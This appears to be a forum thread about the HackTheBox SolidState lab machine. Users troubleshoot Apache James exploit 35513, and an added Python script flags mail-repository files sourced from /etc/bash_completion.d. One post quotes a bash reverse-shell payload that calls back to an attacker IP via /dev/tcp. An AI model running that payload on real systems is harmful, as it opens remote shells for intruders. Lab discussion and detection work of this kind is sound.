Hi,
I’m working on solidstate now, following the official writeup and ippsec’s video. But I found the exploit 35513 doesn’t work anymore. I couldn’t get a reverse shell after SSH login as mindy. Could anyone try it to see if the exploit still works?
I still can’t make it work. I just changed the exploit 35513.py to use my own IP address "payload = '/bin/bash -i >& /dev/tcp/10.10.14.2/443 0>&1'", then executed it to deliver the payload, then used mindy’s SSH login to the machine, and got this garbage information, but the shell never calls back to my nc listener:
Last login: Tue Aug 22 14:00:02 2017 from 192.168.11.142
-rbash: $'\254\355\005sr\036org.apache.james.core.MailImpl\304x\r\345\274\317ݬ\003': command not found
-rbash: L: command not found
-rbash: attributestLjava/util/HashMap: No such file or directory
-rbash: L
errorMessagetLjava/lang/String: No such file or directory
-rbash: L
lastUpdatedtLjava/util/Date: No such file or directory
-rbash: Lmessaget!Ljavax/mail/internet/MimeMessage: No such file or directory
-rbash: $'L\004nameq~\002L': command not found
-rbash: recipientstLjava/util/Collection: No such file or directory
-rbash: L: command not found
-rbash: $'remoteAddrq~\002L': command not found
-rbash: remoteHostq~LsendertLorg/apache/mailet/MailAddress: No such file or directory
-rbash: $'\221\222\204m\307{\244\002\003I\003posL\004hostq~\002L\004userq~\002xp': command not found
-rbash: $'L\005stateq~\002xpsr\035org.apache.mailet.MailAddress': command not found
-rbash: team@team.pl: No such file or directory
-rbash: 4054205.0.1543226381071.JavaMail.root@solidstate: No such file or directory
-rbash: MIME-Version:: command not found
-rbash: Content-Type:: command not found
-rbash: Content-Transfer-Encoding:: command not found
-rbash: Delivered-To:: command not found
-rbash: /etc/bash_completion.d/4D61696C313534333232363338313034352D30.Repository.FileStreamStore: line 7: syntax error near unexpected token ('
-rbash: /etc/bash_completion.d/4D61696C313534333232363338313034352D30.Repository.FileStreamStore: line 7: Received: from 10.10.14.2 ([10.10.14.2])
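Seen from the defender's side, the output above shows bash sourcing a mail-repository file from /etc/bash_completion.d at login. The following is an added example, not part of the thread or of exploit 35513: it flags such files in a completion directory by their hex-encoded name and by the Java serialization header. The name pattern, the function names and the sample files are assumptions constructed here.

```python
import os
import re
import tempfile

# Java serialization stream header; bash printed it above as \254\355\005sr (the NUL is dropped).
JAVA_SER_MAGIC = b"\xac\xed\x00\x05"
# Assumption: generalised from the single file name in the output (<hex key>.Repository.<store type>).
REPO_NAME = re.compile(r"^((?:[0-9A-Fa-f]{2})+)\.Repository\.\w+$")

def decode_key(filename):
    """Return the hex-decoded repository key, or None if the name does not match."""
    m = REPO_NAME.match(filename)
    return bytes.fromhex(m.group(1)).decode("ascii", "replace") if m else None

def scan_dir(path):
    """List (name, reasons) for files that look like mail-store objects, not shell scripts."""
    findings = []
    for name in sorted(os.listdir(path)):
        full = os.path.join(path, name)
        if not os.path.isfile(full):
            continue
        reasons = []
        key = decode_key(name)
        if key is not None:
            reasons.append("repository-style name, key=" + key)
        with open(full, "rb") as fh:
            if fh.read(4) == JAVA_SER_MAGIC:
                reasons.append("java-serialized-object")
        if reasons:
            findings.append((name, reasons))
    return findings

def demo():
    """Build a constructed directory (not real data) and scan it."""
    stream = "4D61696C313534333232363338313034352D30.Repository.FileStreamStore"
    samples = {
        stream: b"MIME-Version: 1.0\r\nReceived: from 10.10.14.2\r\n",
        "opaque-object": JAVA_SER_MAGIC + b"sr\x00\x1eorg.apache.james.core.MailImpl",
        "git": b"# ordinary completion script (constructed)\ncomplete -F _git git\n",
    }
    with tempfile.TemporaryDirectory() as d:
        for name, data in samples.items():
            with open(os.path.join(d, name), "wb") as fh:
                fh.write(data)
        return scan_dir(d)

if __name__ == "__main__":
    for name, reasons in demo():
        print(name, "->", "; ".join(reasons))
```

On a real host, call scan_dir("/etc/bash_completion.d") and review anything it returns, since every file in that directory is sourced by interactive bash logins.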
The exploit worked for me, but for priv esc, when I try to edit the file in vi, I get issues.
Vim: Warning: Output is not to a terminal
Vim: Warning: Input is not from a terminal
Any thoughts on getting around this?